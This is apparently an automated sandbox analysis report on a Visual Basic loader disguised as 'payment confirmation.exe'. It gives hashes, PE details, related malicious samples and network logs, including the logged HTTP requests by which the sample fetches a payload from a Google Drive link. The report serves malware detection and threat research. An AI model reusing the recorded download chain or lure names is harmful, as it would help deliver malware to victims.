                                          • 91.197.229.197
                                          Purchase Payment PPY029618.htmGet hashmaliciousBrowse
                                          • 91.197.229.197
                                          The Placement Group HealthCare Advice.htmGet hashmaliciousBrowse
                                          • 91.197.229.197
                                          jbs.exeGet hashmaliciousBrowse
                                          • 89.145.65.235
                                          Transfer Forms.exeGet hashmaliciousBrowse
                                          • 77.72.201.246
                                          Returned message contents.exeGet hashmaliciousBrowse
                                          • 77.72.201.246
                                          Transfer doc & Returned message content.exeGet hashmaliciousBrowse
                                          • 77.72.201.246
                                          Transfer Forms & Message body content.exeGet hashmaliciousBrowse
                                          • 77.72.201.246
                                          ADT10532.exeGet hashmaliciousBrowse
                                          • 91.197.229.181

                                          JA3 Fingerprints

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          37f463bf4616ecd445d4a1937da06e19recital-239880844.xlsGet hashmaliciousBrowse
                                          • 142.250.74.193
                                          • 142.250.185.206
                                          Unreal.exeGet hashmaliciousBrowse
                                          • 142.250.74.193
                                          • 142.250.185.206
                                          Silver_Light_Group_DOC03027321122.exeGet hashmaliciousBrowse
                                          • 142.250.74.193
                                          • 142.250.185.206
                                          7XmWGse79x.exeGet hashmaliciousBrowse
                                          • 142.250.74.193
                                          • 142.250.185.206
                                          m5W1BZQU4m.exeGet hashmaliciousBrowse
                                          • 142.250.74.193
                                          • 142.250.185.206
                                          hHsIHUGICB.exeGet hashmaliciousBrowse
                                          • 142.250.74.193
                                          • 142.250.185.206
                                          NOgYb2fHbO.exeGet hashmaliciousBrowse
                                          • 142.250.74.193
                                          • 142.250.185.206
                                          VwDvbAowp0.exeGet hashmaliciousBrowse
                                          • 142.250.74.193
                                          • 142.250.185.206
                                          lXy3MnXJ83.exeGet hashmaliciousBrowse
                                          • 142.250.74.193
                                          • 142.250.185.206
                                          BXTOD28N3I.exeGet hashmaliciousBrowse
                                          • 142.250.74.193
                                          • 142.250.185.206
                                          Kapitu.exeGet hashmaliciousBrowse
                                          • 142.250.74.193
                                          • 142.250.185.206
                                          SebwAujas5.exeGet hashmaliciousBrowse
                                          • 142.250.74.193
                                          • 142.250.185.206
                                          nxW9yUgdYM.exeGet hashmaliciousBrowse
                                          • 142.250.74.193
                                          • 142.250.185.206
                                          Payment_Advice.exeGet hashmaliciousBrowse
                                          • 142.250.74.193
                                          • 142.250.185.206
                                          cxBR3cCGTw.exeGet hashmaliciousBrowse
                                          • 142.250.74.193
                                          • 142.250.185.206
                                          k5THcVgINl.exeGet hashmaliciousBrowse
                                          • 142.250.74.193
                                          • 142.250.185.206
                                          b2i2IopgOC.exeGet hashmaliciousBrowse
                                          • 142.250.74.193
                                          • 142.250.185.206
                                          G2BPn4a7o1.exeGet hashmaliciousBrowse
                                          • 142.250.74.193
                                          • 142.250.185.206
                                          Dokument VAT I - 85926 09 2021 MAG-8.exeGet hashmaliciousBrowse
                                          • 142.250.74.193
                                          • 142.250.185.206
                                          qOsCIQD1uR.exeGet hashmaliciousBrowse
                                          • 142.250.74.193
                                          • 142.250.185.206

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          \Device\ConDrv
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):30
                                          Entropy (8bit):3.964735178725505
                                          Encrypted:false
                                          SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                          MD5:9F754B47B351EF0FC32527B541420595
                                          SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                          SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                          SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview: NordVPN directory not found!..

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Entropy (8bit):5.750728457752444
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.15%
                                          • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:payment confirmation.exe
                                          File size:90112
                                          MD5:930debccdeecb4fc138b0319bef33720
                                          SHA1:b56f93dc8316eb35a3b311ce1c412e5d617bcfeb
                                          SHA256:03082b2f67073c9017a28fe1ef9166d38edd339ef72da583653f083ec2b9fac4
                                          SHA512:bfd528e239d9dc5ed5c74b6443eb2f4eacf508e4254a7ece0f5d997f80103afea403510257c83a6820f4aa516ac87614887cb19f3b0082c5b0fd9c3ecab7daa7
                                          SSDEEP:1536:t+xDOj9YiJi9u4zT3rHf4AnDUHK1DxFAWfWt7vAjmt:t+xDO9YiJnELLFnDxF3MA8
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L....).O.................0... ...............@....@........

                                          File Icon

                                          Icon Hash:821ca88c8e8c8c00

                                          Static PE Info

                                          General

                                          Entrypoint:0x4012c8
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                          DLL Characteristics:
                                          Time Stamp:0x4FA929E5 [Tue May 8 14:12:53 2012 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:e73b8c032c82c64991ebe487a7ffcd43

                                          Entrypoint Preview

                                          Instruction
                                          push 0040FF98h
                                          call 00007F1BDCB73FF3h
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          xor byte ptr [eax], al
                                          add byte ptr [eax], al
                                          inc eax
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [esi+01h], al
                                          inc esi
                                          cmp dword ptr [ebx-5ABC39A1h], FFFFFFC6h
                                          or eax, 71097B6Dh
                                          clc
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add dword ptr [eax], eax
                                          add byte ptr [eax], al
                                          cmp eax, 6C614620h
                                          jnc 00007F1BDCB74056h
                                          push 65646E75h
                                          jc 00007F1BDCB74064h
                                          outsd
                                          js 00007F1BDCB74038h
                                          add byte ptr [edx], cl
                                          and byte ptr [0000000Ah], cl
                                          add bh, bh
                                          int3
                                          xor dword ptr [eax], eax
                                          cmp cl, dl
                                          jo 00007F1BDCB74014h
                                          or al, D2h
                                          xor al, E2h
                                          inc ecx
                                          lea ebp, dword ptr [ecx+4AEA7E0Ch]
                                          setnb byte ptr [eax]
                                          adc al, C4h
                                          scasd
                                          sbb eax, 8F43FF8Ch
                                          das
                                          mov byte ptr [752CBDB8h], al
                                          sub edi, dword ptr [edx]
                                          dec edi
                                          lodsd
                                          xor ebx, dword ptr [ecx-48EE309Ah]
                                          or al, 00h
                                          stosb
                                          add byte ptr [eax-2Dh], ah
                                          xchg eax, ebx
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          and al, EAh
                                          add byte ptr [eax], al
                                          xchg eax, edi
                                          add dword ptr [eax], eax
                                          add byte ptr [eax], al
                                          or byte ptr [eax], al
                                          arpl word ptr [eax+65h], bp
                                          insb
                                          jns 00007F1BDCB74066h
                                          jc 00007F1BDCB74067h
                                          add byte ptr [55000B01h], cl
                                          inc esp
                                          pop ecx
                                          inc edi
                                          push esp
                                          dec ecx

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x136b40x28.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x150000x540.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
                                          IMAGE_DIRECTORY_ENTRY_IAT0x10000xe8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x12b1c0x13000False0.519017269737data6.24212865941IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .data0x140000xcf40x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                          .rsrc0x150000x5400x1000False0.129150390625data1.40409416772IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountry
                                          RT_ICON0x154180x128GLS_BINARY_LSB_FIRST
                                          RT_GROUP_ICON0x154040x14data
                                          RT_VERSION0x150f00x314dataChineseTaiwan

                                          Imports

                                          DLLImport
                                          MSVBVM60.DLL_CIcos, _adj_fptan, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaAryConstruct2, __vbaObjVar, DllFunctionCall, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaStrToAnsi, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                                          Version Infos

                                          DescriptionData
                                          Translation0x0404 0x04b0
                                          LegalCopyrightChatSwipe
                                          InternalNamedamrred
                                          FileVersion4.04.0001
                                          CompanyNameChatSwipe
                                          LegalTrademarksChatSwipe
                                          CommentsChatSwipe
                                          ProductNameChatSwipe
                                          ProductVersion4.04.0001
                                          FileDescriptionChatSwipe
                                          OriginalFilenamedamrred.exe

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          ChineseTaiwan

                                          Network Behavior

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 27, 2021 17:30:08.830467939 CEST49794443192.168.11.20142.250.185.206
                                          Sep 27, 2021 17:30:08.830544949 CEST44349794142.250.185.206192.168.11.20
                                          Sep 27, 2021 17:30:08.830709934 CEST49794443192.168.11.20142.250.185.206
                                          Sep 27, 2021 17:30:08.844734907 CEST49794443192.168.11.20142.250.185.206
                                          Sep 27, 2021 17:30:08.844777107 CEST44349794142.250.185.206192.168.11.20
                                          Sep 27, 2021 17:30:08.895445108 CEST44349794142.250.185.206192.168.11.20
                                          Sep 27, 2021 17:30:08.895689011 CEST49794443192.168.11.20142.250.185.206
                                          Sep 27, 2021 17:30:08.897387981 CEST44349794142.250.185.206192.168.11.20
                                          Sep 27, 2021 17:30:08.897670031 CEST49794443192.168.11.20142.250.185.206
                                          Sep 27, 2021 17:30:09.058203936 CEST49794443192.168.11.20142.250.185.206
                                          Sep 27, 2021 17:30:09.058259964 CEST44349794142.250.185.206192.168.11.20
                                          Sep 27, 2021 17:30:09.058933973 CEST44349794142.250.185.206192.168.11.20
                                          Sep 27, 2021 17:30:09.059062004 CEST49794443192.168.11.20142.250.185.206
                                          Sep 27, 2021 17:30:09.061395884 CEST49794443192.168.11.20142.250.185.206
                                          Sep 27, 2021 17:30:09.102035046 CEST44349794142.250.185.206192.168.11.20
                                          Sep 27, 2021 17:30:09.564866066 CEST44349794142.250.185.206192.168.11.20
                                          Sep 27, 2021 17:30:09.565001965 CEST44349794142.250.185.206192.168.11.20
                                          Sep 27, 2021 17:30:09.565046072 CEST49794443192.168.11.20142.250.185.206
                                          Sep 27, 2021 17:30:09.565220118 CEST49794443192.168.11.20142.250.185.206
                                          Sep 27, 2021 17:30:09.565258026 CEST44349794142.250.185.206192.168.11.20
                                          Sep 27, 2021 17:30:09.565361977 CEST49794443192.168.11.20142.250.185.206
                                          Sep 27, 2021 17:30:09.565377951 CEST44349794142.250.185.206192.168.11.20
                                          Sep 27, 2021 17:30:09.565546036 CEST49794443192.168.11.20142.250.185.206
                                          Sep 27, 2021 17:30:09.569323063 CEST49794443192.168.11.20142.250.185.206
                                          Sep 27, 2021 17:30:09.569422007 CEST44349794142.250.185.206192.168.11.20
                                          Sep 27, 2021 17:30:09.657718897 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:09.657790899 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:09.658024073 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:09.658343077 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:09.658399105 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:09.709714890 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:09.709952116 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:09.712595940 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:09.712960005 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:09.716348886 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:09.716379881 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:09.716979027 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:09.717107058 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:09.717679024 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:09.757930994 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.096776962 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.096973896 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:10.097270012 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.097537994 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:10.098007917 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.098252058 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:10.099370003 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.099488020 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.099550009 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:10.099576950 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:10.099597931 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.099797010 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:10.102042913 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.102303982 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:10.104876995 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.105144024 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:10.106467009 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.106662989 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:10.106709003 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.106854916 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.106864929 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:10.106901884 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.107078075 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:10.107414961 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.107698917 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:10.107744932 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.108001947 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:10.108215094 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.108434916 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:10.108481884 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.108834028 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.109168053 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:10.109224081 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.109283924 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:10.109601021 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:10.109631062 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.109656096 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.109792948 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:10.110018969 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.110280991 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:10.110330105 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.110568047 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:10.110780001 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.110938072 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:10.110972881 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.111239910 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:10.111490965 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.111644983 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:10.111677885 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.111892939 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:10.111927986 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.112157106 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:10.112396002 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.112554073 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:10.112601995 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.112844944 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:10.112895012 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.113137960 CEST49795443192.168.11.20142.250.74.193
                                          Sep 27, 2021 17:30:10.113387108 CEST44349795142.250.74.193192.168.11.20
                                          Sep 27, 2021 17:30:10.113554955 CEST49795443192.168.11.20142.250.74.193

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 27, 2021 17:29:20.725512028 CEST5125453192.168.11.201.1.1.1
                                          Sep 27, 2021 17:29:20.735110998 CEST53512541.1.1.1192.168.11.20
                                          Sep 27, 2021 17:29:20.817637920 CEST6155153192.168.11.201.1.1.1
                                          Sep 27, 2021 17:29:20.827188969 CEST53615511.1.1.1192.168.11.20
                                          Sep 27, 2021 17:29:43.083122015 CEST5508153192.168.11.201.1.1.1
                                          Sep 27, 2021 17:29:43.092348099 CEST53550811.1.1.1192.168.11.20
                                          Sep 27, 2021 17:29:43.390132904 CEST5975953192.168.11.201.1.1.1
                                          Sep 27, 2021 17:29:43.400618076 CEST53597591.1.1.1192.168.11.20
                                          Sep 27, 2021 17:30:08.804713964 CEST5386153192.168.11.201.1.1.1
                                          Sep 27, 2021 17:30:08.813525915 CEST53538611.1.1.1192.168.11.20
                                          Sep 27, 2021 17:30:09.619599104 CEST6199153192.168.11.201.1.1.1
                                          Sep 27, 2021 17:30:09.656533957 CEST53619911.1.1.1192.168.11.20
                                          Sep 27, 2021 17:31:45.299603939 CEST4971953192.168.11.201.1.1.1
                                          Sep 27, 2021 17:31:45.478720903 CEST53497191.1.1.1192.168.11.20
                                          Sep 27, 2021 17:35:11.204082966 CEST5254053192.168.11.201.1.1.1
                                          Sep 27, 2021 17:35:11.212968111 CEST53525401.1.1.1192.168.11.20

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Sep 27, 2021 17:30:08.804713964 CEST192.168.11.201.1.1.10x5c38Standard query (0)drive.google.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 17:30:09.619599104 CEST192.168.11.201.1.1.10x3b20Standard query (0)doc-08-50-docs.googleusercontent.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 17:31:45.299603939 CEST192.168.11.201.1.1.10x5844Standard query (0)mail.pizzascasadelfi.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 17:35:11.204082966 CEST192.168.11.201.1.1.10x3e04Standard query (0)spclient.wg.spotify.comA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Sep 27, 2021 17:30:08.813525915 CEST1.1.1.1192.168.11.200x5c38No error (0)drive.google.com142.250.185.206A (IP address)IN (0x0001)
                                          Sep 27, 2021 17:30:09.656533957 CEST1.1.1.1192.168.11.200x3b20No error (0)doc-08-50-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                          Sep 27, 2021 17:30:09.656533957 CEST1.1.1.1192.168.11.200x3b20No error (0)googlehosted.l.googleusercontent.com142.250.74.193A (IP address)IN (0x0001)
                                          Sep 27, 2021 17:31:45.478720903 CEST1.1.1.1192.168.11.200x5844No error (0)mail.pizzascasadelfi.com91.197.229.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 17:35:11.212968111 CEST1.1.1.1192.168.11.200x3e04No error (0)spclient.wg.spotify.comedge-web.dual-gslb.spotify.comCNAME (Canonical name)IN (0x0001)
                                          Sep 27, 2021 17:35:11.212968111 CEST1.1.1.1192.168.11.200x3e04No error (0)edge-web.dual-gslb.spotify.com35.186.224.25A (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • drive.google.com
                                          • doc-08-50-docs.googleusercontent.com

                                          HTTPS Proxied Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.11.2049794142.250.185.206443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          TimestampkBytes transferredDirectionData
                                          2021-09-27 15:30:09 UTC0OUTGET /uc?export=download&id=1-NGqww34y3w8ohKj32E_9V1PymXSPn6n HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                          Host: drive.google.com
                                          Cache-Control: no-cache
                                          2021-09-27 15:30:09 UTC0INHTTP/1.1 302 Moved Temporarily
                                          Content-Type: text/html; charset=UTF-8
                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                          Pragma: no-cache
                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                          Date: Mon, 27 Sep 2021 15:30:09 GMT
                                          Location: https://doc-08-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v2kr4nhgnks06n5389380k8fa8p4g3sj/1632756600000/00519186742208262786/*/1-NGqww34y3w8ohKj32E_9V1PymXSPn6n?e=download
                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                          Content-Security-Policy: script-src 'nonce-39+FXEuaFVP3xgwvJQ82bQ' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                          X-Content-Type-Options: nosniff
                                          X-Frame-Options: SAMEORIGIN
                                          X-XSS-Protection: 1; mode=block
                                          Server: GSE
                                          Set-Cookie: NID=511=EQ4VOsGbyjiKiI1FIA09QekgyPZDhnDiKEAiHNSRhziWQ-XQFGKbLrYkjfHsEX20il4ASP3G5Cft-4Jd-GbTtoU1MK9gu2NkQmkMOrnVqYDbPJIiJT8iCztLSkCTHWuSgle3h_NZsGALpb6wrNp_-R5HrPZdqgLB11lmUCfLcA0; expires=Tue, 29-Mar-2022 15:30:09 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                          Accept-Ranges: none
                                          Vary: Accept-Encoding
                                          Connection: close
                                          Transfer-Encoding: chunked
                                          2021-09-27 15:30:09 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 38 2d 35 30 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 76 32 6b 72
                                          Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-08-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v2kr
                                          2021-09-27 15:30:09 UTC1INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          1192.168.11.2049795142.250.74.193443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          TimestampkBytes transferredDirectionData
                                          2021-09-27 15:30:09 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v2kr4nhgnks06n5389380k8fa8p4g3sj/1632756600000/00519186742208262786/*/1-NGqww34y3w8ohKj32E_9V1PymXSPn6n?e=download HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                          Cache-Control: no-cache
                                          Host: doc-08-50-docs.googleusercontent.com
                                          Connection: Keep-Alive
                                          2021-09-27 15:30:10 UTC2INHTTP/1.1 200 OK
                                          X-GUploader-UploadID: ADPycdsJhM2xmp--H5LT3fqM8jUM5p5KTBipN-sYQS-h_qeXaQpLKoMFyeuBLXynRoBuMBx6T9s9aGEKvNLwPWpERTCZ3iiLbw
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Credentials: false
